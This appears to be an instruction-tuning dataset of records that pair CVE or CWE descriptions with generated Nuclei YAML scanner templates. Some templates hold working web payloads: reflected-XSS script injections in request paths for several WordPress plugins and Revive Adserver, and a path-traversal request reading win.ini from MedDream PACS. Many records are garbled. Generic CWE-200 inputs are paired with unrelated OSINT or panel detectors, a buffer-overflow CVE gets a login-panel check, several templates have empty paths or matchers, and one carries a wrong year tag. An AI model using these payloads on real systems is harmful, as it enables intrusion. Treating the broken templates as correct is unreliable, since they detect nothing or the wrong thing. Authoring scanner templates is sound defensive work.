+{"instruction": "Generate a Nuclei template for CVE-2023-38040", "input": "Title: Cross-Site Scripting (XSS) in revive-adserver revive_adserver\nSummary: A reflected XSS vulnerability exists in Revive Adserver 5.4.1 and earlier versions..\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: revive-adserver revive_adserver\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-38040\n\ninfo:\n name: Revive Adserver 5.4.1 - Cross-Site Scripting\n author: ritikchaddha\n severity: medium\n description: A reflected XSS vulnerability exists in Revive Adserver 5.4.1 and earlier versions.\n tags: cve,cve2023,revive-adserver,xss,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Revive Adserver\" \n part: body\n - method: GET\n path:\n - \"{{BaseURL}}/www/delivery/al.php?zoneid=1&layerstyle=geocities&closetext=%3Cscript%3Ealert(document.domain);%3C/script%3E\" \n matchers:\n - type: word\n words:\n - \"\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: content_type\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2023-38040"}
+{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: buymeacoffee\n\ninfo:\n name: Buymeacoffee User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Buymeacoffee user name information check was conducted.\n tags: osint,osint-finance,buymeacoffee,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://www.buymeacoffee.com/{{user}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"supporters\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"}
+{"instruction": "Generate a Nuclei template for CVE-2019-8985", "input": "Title: Vulnerability (CWE-306) in netis-systems wf2411_firmware and others\nSummary: On Netis WF2411 with firmware 2.1.36123 and other Netis WF2xxx devices (possibly WF2411 through WF2880), there is a stack-based buffer overflow that does not require authentication. This can cause denial of service (device restart) or remote code execution. This vulnerability can be triggered by a GET request with a long HTTP \"Authorization: Basic\" header that is mishandled by user_auth->user_ok in /bin/boa.\nVulnerability Type: Vulnerability (CWE-306)\nSeverity: critical\nAffected Products: netis-systems wf2411_firmware, netis-systems wf2880_firmware\nIndicators: error, vulnerability detected", "output": "id: netis-router\n\ninfo:\n name: Netis Router Login Panel - Detect\n author: gy741\n severity: info\n description: Netis router login panel was detected.\n tags: panel,login,netis,router,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/login.htm\" \n matchers:\n - type: word\n words:\n - \"AP setup\" \n part: body\n - type: word\n words:\n - \"Server: netis\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2019-8985"}
+{"instruction": "Generate a Nuclei template for: Jolokia write to RCE valve", "input": "Title: Jolokia write to RCE valve\nSummary: Jolokia write to RCE valve. RCE in Jolokia < 1.7.1 using AccesLogValve\nVulnerability Type: Security Check\nSeverity: critical\nIndicators: vulnerability detected", "output": "id: jolokia-acceslogvalve-rce\n\ninfo:\n name: Jolokia write to RCE valve\n author: pathtaga\n severity: critical\n description: RCE in Jolokia < 1.7.1 using AccesLogValve\n tags: jolokia,rce,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/jolokia/list\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"\"host=localhost,name=AccessLogValve,type=Valve\"\" \n part: body", "category": "generic", "severity": "critical", "id": "jolokia-acceslogvalve-rce"}
+{"instruction": "Generate a Nuclei template for CVE-2024-6924", "input": "Title: SQL Injection in themetechmount truebooker\nSummary: The TrueBooker WordPress plugin before 1.0.3 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.\nVulnerability Type: SQL Injection\nSeverity: critical\nAffected Products: themetechmount truebooker\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-6924\n\ninfo:\n name: TrueBooker <= 1.0.2 - SQL Injection\n author: s4e-io\n severity: high\n description: The TrueBooker Appointment Booking and Scheduler Plugin. plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 1.0.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.\n tags: time-based-sqli,wpscan,cve,cve2024,sqli,wp,wp-plugin,wordpress,truebooker,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2024-6924"}
+{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: xvr-login\n\ninfo:\n name: XVR Login Panel - Detect\n author: dhiyaneshDK\n severity: info\n description: XVR login panel was detected.\n tags: panel,xvr,dahuasecurity,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/login.rsp\" \n matchers:\n - type: word\n words:\n - \"XVR LOGIN\" \n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"}
+{"instruction": "Generate a Nuclei template for CVE-2024-24329", "input": "Title: OS Command Injection in totolink a3300r_firmware\nSummary: TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the enable parameter in the setPortForwardRules function.\nVulnerability Type: OS Command Injection\nSeverity: critical\nAffected Products: totolink a3300r_firmware\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-24329\n\ninfo:\n name: TotoLink Router setPortForwardRules - Command Injection\n author: pussycat0x\n severity: critical\n description: TOTOLINK A3300R V17.0.0cu.557_B20221024 was discovered to contain a command injection vulnerability via the enable parameter in the setPortForwardRules function.\n tags: cve,cve2024,totolink,router,toto_link,unauth,intrusive,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2024-24329"}
+{"instruction": "Generate a Nuclei template for CVE-2011-5181", "input": "Title: Cross-Site Scripting (XSS) in clickdesk clickdesk_live_support-live_chat_plugin\nSummary: Cross-site scripting (XSS) vulnerability in clickdesk.php in ClickDesk Live Support - Live Chat plugin 2.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cdwidgetid parameter. NOTE: some of these details are obtained from third party information.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: clickdesk clickdesk_live_support-live_chat_plugin\nIndicators: error, vulnerability detected", "output": "id: CVE-2011-5181\n\ninfo:\n name: ClickDesk Live Support Live Chat 2.0 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: A cross-site scripting vulnerability in clickdesk.php in ClickDesk Live Support - Live Chat plugin 2.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cdwidgetid parameter.\n tags: cve2011,cve,wordpress,xss,wp-plugin,clickdesk,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"ClickDesk Live Support - Live Chat\" \n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\" \n matchers:\n - type: word\n words:\n - \"\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2011-5181"}
+{"instruction": "Generate a Nuclei template for: Yacht - Default Login", "input": "Title: Yacht - Default Login\nSummary: Yacht - Default Login. Yacht is a web interface for managing Docker containers. This template detects instances with default admin credentials (admin@yacht.local:pass), which could allow unauthorized access to the Docker environment, potentially leading to container manipulation, data exposure, or even host system compromise.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: yacht-default-login\n\ninfo:\n name: Yacht - Default Login\n author: Fur1na\n severity: high\n description: Yacht is a web interface for managing Docker containers. This template detects instances with default admin credentials (admin@yacht.local:pass), which could allow unauthorized access to the Docker environment, potentially leading to container manipulation, data exposure, or even host system compromise.\n tags: default-login,yacht,misconfig,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\"access_token\":\" \n - \":\"successful\"\" \n part: body\n condition: and\n - type: word\n words:\n - \"application/json\" \n part: content_type\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "yacht-default-login"}
+{"instruction": "Generate a Nuclei template for CVE-2022-24706", "input": "Title: Vulnerability (CWE-1188) in apache couchdb\nSummary: In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges. The CouchDB documentation has always made recommendations for properly securing an installation, including recommending using a firewall in front of all CouchDB installations.\nVulnerability Type: Vulnerability (CWE-1188)\nSeverity: critical\nAffected Products: apache couchdb\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-24706\n\ninfo:\n name: CouchDB Erlang Distribution - Remote Command Execution\n author: Mzack9999,pussycat0x\n severity: critical\n description: In Apache CouchDB prior to 3.2.2, an attacker can access an improperly secured default installation without authenticating and gain admin privileges.\n tags: cve2022,network,cve,couch,rce,kev,couchdb,apache,tcp,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2022-24706"}
+{"instruction": "Generate a Nuclei template for CVE-2023-22518", "input": "Title: Vulnerability (CWE-863) in atlassian confluence_data_center and others\nSummary: All versions of Confluence Data Center and Server are affected by this unexploited vulnerability. This Improper Authorization vulnerability allows an unauthenticated attacker to reset Confluence and create a Confluence instance administrator account. Using this account, an attacker can then perform all administrative actions that are available to\u00a0Confluence instance administrator leading to - but not limited to - full loss of confidentiality, integrity and availability.\u00a0\n\nAtlassian Cloud sites are not affected by this vulnerability. If your Confluence site is accessed via an atlassian.net domain, it is hosted by Atlassian and is not vulnerable to this issue.\nVulnerability Type: Vulnerability (CWE-863)\nSeverity: critical\nAffected Products: atlassian confluence_data_center, atlassian confluence_server\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-22518\n\ninfo:\n name: Atlassian Confluence Server - Improper Authorization\n author: iamnoooob,rootxharsh,pdresearch\n severity: critical\n description: All versions of Confluence Data Center and Server are affected by this unexploited vulnerability. There is no impact to confidentiality as an attacker cannot exfiltrate any instance data.\nAtlassian Cloud sites are not affected by this vulnerability. If your Confluence site is accessed via an atlassian.net domain, it is hosted by Atlassian and is not vulnerable to this issue.\n tags: cve,cve2023,atlassian,confluence,rce,unauth,intrusive,kev,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2023-22518"}
+{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: vrealize-hyperic-panel\n\ninfo:\n name: vRealize Hyperic Login Panel - Detect\n author: Charles D\n severity: info\n description: vRealize Hyperic login panel was detected\n tags: login,panel,vrealize,hyperic,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/app/login\" \n matchers:\n - type: word\n words:\n - \"Sign In - Hyperic\" \n part: body\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"}
+{"instruction": "Generate a Nuclei template for: Protractor Configuration Exposure", "input": "Title: Protractor Configuration Exposure\nSummary: Protractor Configuration Exposure. Protractor configuration file was detected.\n\nVulnerability Type: Security Check\nSeverity: low\nIndicators: vulnerability detected", "output": "id: protractor-config\n\ninfo:\n name: Protractor Configuration Exposure\n author: DhiyaneshDK\n severity: low\n description: Protractor configuration file was detected.\n tags: devops,exposure,protractor,config,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/protractor.conf.js\" \n matchers:\n - type: word\n words:\n - \"exports.config\" \n - \"capabilities:\" \n part: body\n condition: and\n - type: word\n words:\n - \"application/javascript\" \n part: header\n - type: status\n status:\n - 200", "category": "generic", "severity": "low", "id": "protractor-config"}
+{"instruction": "Generate a Nuclei template for CVE-2022-4295", "input": "Title: Unknown Vulnerability in appjetty show_all_comments\nSummary: The Show All Comments WordPress plugin before 7.0.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against a logged in high privilege users such as admin.\nVulnerability Type: Unknown Vulnerability\nSeverity: medium\nAffected Products: appjetty show_all_comments\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-4295\n\ninfo:\n name: Show all comments < 7.0.1 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: The Show All Comments WordPress plugin before 7.0.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against a logged in high privilege users such as admin.\n tags: cve2022,cve,wpscan,wp,wordpress,wp-plugin,xss,show-all-comments-in-one-page,appjetty,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-admin/admin-ajax.php?action=sac_post_type_call&post_type=\" \n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "medium", "id": "CVE-2022-4295"}
+{"instruction": "Generate a Nuclei template for CVE-2024-45388", "input": "Title: Information Disclosure in hoverfly hoverfly\nSummary: Hoverfly is a lightweight service virtualization/ API simulation / API mocking tool for developers and testers. The `/api/v2/simulation` POST handler allows users to create new simulation views from the contents of a user-specified file. This feature can be abused by an attacker to read arbitrary files from the Hoverfly server. Note that, although the code prevents absolute paths from being specified, an attacker can escape out of the `hf.Cfg.ResponsesBodyFilesPath` base path by using `../` segments and reach any arbitrary files. This issue was found using the Uncontrolled data used in path expression CodeQL query for python. Users are advised to make sure the final path (`filepath.Join(hf.Cfg.ResponsesBodyFilesPath, filePath)`) is contained within the expected base path (`filepath.Join(hf.Cfg.ResponsesBodyFilesPath, \"/\")`). This issue is also tracked as GHSL-2023-274.\nVulnerability Type: Information Disclosure\nSeverity: high\nAffected Products: hoverfly hoverfly\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-45388\n\ninfo:\n name: Hoverfly < 1.10.3 - Arbitrary File Read\n author: iamnoooob,rootxharsh,pdresearch\n severity: high\n description: Hoverfly is a lightweight service virtualization/ API simulation / API mocking tool for developers and testers. The /api/v2/simulation POST handler allows users to create new simulation views from the contents of a user-specified file. This feature can be abused by an attacker to read arbitrary files from the Hoverfly server.\n tags: cve,cve2024,hoverfly,lfi,intrusive,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: regex\n condition: and\n - type: word\n words:\n - \"application/json\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2024-45388"}
+{"instruction": "Generate a Nuclei template for CVE-2011-5106", "input": "Title: Cross-Site Scripting (XSS) in fractalia flexible_custom_post_type\nSummary: Cross-site scripting (XSS) vulnerability in edit-post.php in the Flexible Custom Post Type plugin before 0.1.7 for WordPress allows remote attackers to inject arbitrary web script or HTML via the id parameter.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: fractalia flexible_custom_post_type\nIndicators: error, vulnerability detected", "output": "id: CVE-2011-5106\n\ninfo:\n name: WordPress Plugin Flexible Custom Post Type < 0.1.7 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: A cross-site scripting vulnerability in edit-post.php in the Flexible Custom Post Type plugin before 0.1.7 for WordPress allows remote attackers to inject arbitrary web script or HTML via the id parameter.\n tags: cve,cve2011,wordpress,xss,wp-plugin,fractalia,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\" \n matchers:\n - type: word\n words:\n - \"\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2011-5106"}
+{"instruction": "Generate a Nuclei template for CVE-2025-6851", "input": "Title: Vulnerability (CWE-918) in pluginrx broken_link_notifier\nSummary: The Broken Link Notifier plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.3.0 via the ajax_blinks() function which ultimately calls the check_url_status_code() function. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.\nVulnerability Type: Vulnerability (CWE-918)\nSeverity: high\nAffected Products: pluginrx broken_link_notifier\nIndicators: error, vulnerability detected", "output": "id: CVE-2025-6851\n\ninfo:\n name: WordPress Broken Link Notifier < 1.3.1 - Unauthenticated SSRF\n author: iamnoooob,pdresearch\n severity: high\n description: The Broken Link Notifier plugin for WordPress is vulnerable to Server-Side Request Forgery in all versions up to, and including, 1.3.0 via the ajax_blinks() function which ultimately calls the check_url_status_code() function. This makes it possible for unauthenticated attackers to make web requests to arbitrary locations originating from the web application and can be used to query and modify information from internal services.\n tags: cve,cve2025,wp-plugin,wordpress,ssrf,oast,unauth,wpscan,broken-link-notifier,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "high", "id": "CVE-2025-6851"}
+{"instruction": "Generate a Nuclei template to detect Path Traversal", "input": "Title: Path Traversal (CWE-22)\nSummary: The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. Many file operations are intended to take place within a restricted directory. By using special elements such as \"..\" and \"/\" separators, attackers can escap\nVulnerability Type: Path Traversal\nSeverity: high\nIndicators: unexpected", "output": "id: sofneta-mecdream-pacs-lfi\n\ninfo:\n name: Softneta MedDream PACS Server Premium 6.7.1.1 - Local File Inclusion\n author: 0x_akoko\n severity: high\n description: Softneta MedDream PACS Server Premium 6.7.1.1 is vulnerable to local file inclusion.\n tags: sofneta,lfi,edb,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/pacs/nocache.php?path=%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini\" \n matchers:\n - type: word\n words:\n - \"bit app support\" \n - \"fonts\" \n - \"extensions\" \n part: body\n condition: and", "category": "cwe", "severity": "high", "id": "CWE-22"}
+{"instruction": "Generate a Nuclei template for CVE-2022-42475", "input": "Title: Vulnerability (CWE-197) in fortinet fortios and others\nSummary: A heap-based buffer overflow vulnerability [CWE-122]\u00a0in FortiOS SSL-VPN 7.2.0 through 7.2.2, 7.0.0 through 7.0.8, 6.4.0 through 6.4.10, 6.2.0 through 6.2.11, 6.0.15 and earlier and FortiProxy SSL-VPN 7.2.0 through 7.2.1, 7.0.7 and earlier may allow a remote unauthenticated attacker to execute arbitrary code or commands via specifically crafted requests.\nVulnerability Type: Vulnerability (CWE-197)\nSeverity: critical\nAffected Products: fortinet fortios, fortinet fortiproxy\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-42475\n\ninfo:\n name: Fortinet SSL-VPN - Heap-Based Buffer Overflow\n author: 0xhaggis,pszyszkowski,pussycat0x\n severity: critical\n description: A heap-based buffer overflow vulnerability [CWE-122] in FortiOS SSL-VPN (versions 7.2.0 through 7.2.2, 7.0.0 through 7.0.8, 6.4.0 through 6.4.10, 6.2.0 through 6.2.11, 6.0.15 and earlier) and FortiProxy SSL-VPN (versions 7.2.0 through 7.2.1, 7.0.7 and earlier) may allow a remote unauthenticated attacker to execute arbitrary code or commands via specifically crafted requests.\n tags: cve,cve2024,ssl-vpn,vpn,fortios,fortigate,heap-based,bufferoverflow,kev,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/remote/login\" \n - \"{{BaseURL}}/login\" \n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2022-42475"}
+{"instruction": "Generate a Nuclei template for: PixelYourSite \u2013 Your smart PIXEL (TAG) & API Manager Detection", "input": "Title: PixelYourSite \u2013 Your smart PIXEL (TAG) & API Manager Detection\nSummary: PixelYourSite \u2013 Your smart PIXEL (TAG) & API Manager Detection\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: wordpress-pixelyoursite\n\ninfo:\n name: PixelYourSite \u2013 Your smart PIXEL (TAG) & API Manager Detection\n author: ricardomaia\n severity: info\n description: PixelYourSite \u2013 Your smart PIXEL (TAG) & API Manager Detection\n tags: tech,wordpress,wp-plugin,top-200,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/pixelyoursite/readme.txt\" \n matchers:\n - type: dsl\n - type: regex\n part: body", "category": "generic", "severity": "info", "id": "wordpress-pixelyoursite"}
+{"instruction": "Generate a Nuclei template for: Fortinet FortiDDoS Panel", "input": "Title: Fortinet FortiDDoS Panel\nSummary: Fortinet FortiDDoS Panel. Fortinet FortiDDoS panel was detected.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: fortinet-fortiddos-panel\n\ninfo:\n name: Fortinet FortiDDoS Panel\n author: johnk3r\n severity: info\n description: Fortinet FortiDDoS panel was detected.\n tags: panel,fortinet,fortiddos,login,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"FortiDDoS\" \n part: body\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "fortinet-fortiddos-panel"}
+{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: supervpn-detect\n\ninfo:\n name: SuperVPN Login Panel - Detect\n author: organiccrap\n severity: info\n description: SuperVPN login panel was detected.\n tags: panel,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/admin/login.html\" \n matchers:\n - type: word\n words:\n - \"Sign In-SuperVPN\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"}
+{"instruction": "Generate a Nuclei template for CVE-2023-22527", "input": "Title: Vulnerability (CWE-74) in atlassian confluence_data_center and others\nSummary: A template injection vulnerability on older versions of Confluence Data Center and Server allows an unauthenticated attacker to achieve RCE on an affected instance. Customers using an affected version must take immediate action.\n\nMost recent supported versions of Confluence Data Center and Server are not affected by this vulnerability as it was ultimately mitigated during regular version updates. However, Atlassian recommends that customers take care to install the latest version to protect their instances from non-critical vulnerabilities outlined in Atlassian\u2019s January Security Bulletin.\nVulnerability Type: Vulnerability (CWE-74)\nSeverity: critical\nAffected Products: atlassian confluence_data_center, atlassian confluence_server\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-22527\n\ninfo:\n name: Atlassian Confluence - Remote Code Execution\n author: iamnooob,rootxharsh,pdresearch\n severity: critical\n description: A template injection vulnerability on older versions of Confluence Data Center and Server allows an unauthenticated attacker to achieve RCE on an affected instance. Customers using an affected version must take immediate action.\nMost recent supported versions of Confluence Data Center and Server are not affected by this vulnerability as it was ultimately mitigated during regular version updates. However, Atlassian recommends that customers take care to install the latest version to protect their instances from non-critical vulnerabilities outlined in Atlassian\u2019s January Security Bulletin.\n tags: packetstorm,cve,cve2023,confluence,rce,ssti,kev,atlassian,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2023-22527"}
+{"instruction": "Generate a Nuclei template for CVE-2023-4151", "input": "Title: Unknown Vulnerability in agilelogix store_locator\nSummary: The Store Locator WordPress plugin before 1.4.13 does not sanitise and escape an invalid nonce before outputting it back in an AJAX response, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin\nVulnerability Type: Unknown Vulnerability\nSeverity: medium\nAffected Products: agilelogix store_locator\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-4151\n\ninfo:\n name: Store Locator WordPress < 1.4.13 - Cross-Site Scripting\n author: ritikchaddha\n severity: medium\n description: The Store Locator WordPress plugin before 1.4.13 does not sanitise and escape an invalid nonce before outputting it back in an AJAX response, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n tags: cve,cve2024,wp,wordpress,wp-plugin,agile-store-locator,xss,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"/wp-content/plugins/agile-store-locator\" \n part: body\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"\" \n part: body_2\n - type: word\n words:\n - \"text/html\" \n part: content_type_2\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2023-4151"}
+{"instruction": "Generate a Nuclei template for: MobileIron Security Checks", "input": "Title: MobileIron Security Checks\nSummary: MobileIron Security Checks. A simple workflow that runs all MobileIron related nuclei templates on a given target.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: mobileiron-workflow\n\ninfo:\n name: MobileIron Security Checks\n author: daffainfo\n severity: info\n description: A simple workflow that runs all MobileIron related nuclei templates on a given target.\n tags: unknown\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "mobileiron-workflow"}
+{"instruction": "Generate a Nuclei template for CVE-2017-1000353", "input": "Title: Deserialization of Untrusted Data in jenkins jenkins and others\nSummary: Jenkins versions 2.56 and earlier as well as 2.46.1 LTS and earlier are vulnerable to an unauthenticated remote code execution. An unauthenticated remote code execution vulnerability allowed attackers to transfer a serialized Java `SignedObject` object to the Jenkins CLI, that would be deserialized using a new `ObjectInputStream`, bypassing the existing blacklist-based protection mechanism. We're fixing this issue by adding `SignedObject` to the blacklist. We're also backporting the new HTTP CLI protocol from Jenkins 2.54 to LTS 2.46.2, and deprecating the remoting-based (i.e. Java serialization) CLI protocol, disabling it by default.\nVulnerability Type: Deserialization of Untrusted Data\nSeverity: critical\nAffected Products: jenkins jenkins, oracle communications_cloud_native_core_automated_test_suite\nIndicators: error, vulnerability detected", "output": "id: CVE-2017-1000353\n\ninfo:\n name: Jenkins CLI - Java Deserialization\n author: hnd3884\n severity: critical\n description: Jenkins versions 2.56 and earlier as well as 2.46.1 LTS and earlier are vulnerable to an unauthenticated remote code execution. An unauthenticated remote code execution vulnerability allowed attackers to transfer a serialized Java `SignedObject` object to the Jenkins CLI, that would be deserialized using a new `ObjectInputStream`, bypassing the existing blacklist-based protection mechanism. We're fixing this issue by adding `SignedObject` to the blacklist. We're also backporting the new HTTP CLI protocol from Jenkins 2.54 to LTS 2.46.2, and deprecating the remoting-based (i.e. Java serialization) CLI protocol, disabling it by default.\n tags: cve,cve2017,jenkins,rce,vkev,kev,vuln\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2017-1000353"}
+{"instruction": "Generate a Nuclei template for: o2 phishing Detection", "input": "Title: o2 phishing Detection\nSummary: o2 phishing Detection. A o2 phishing website was detected\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: o2-mobile-phish\n\ninfo:\n name: o2 phishing Detection\n author: rxerium\n severity: info\n description: A o2 phishing website was detected\n tags: phishing,o2,osint,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"O2 | Phone, SIM & Tech Deals - See What You Can Do\" \n - type: status\n status:\n - 200\n - type: dsl", "category": "generic", "severity": "info", "id": "o2-mobile-phish"}
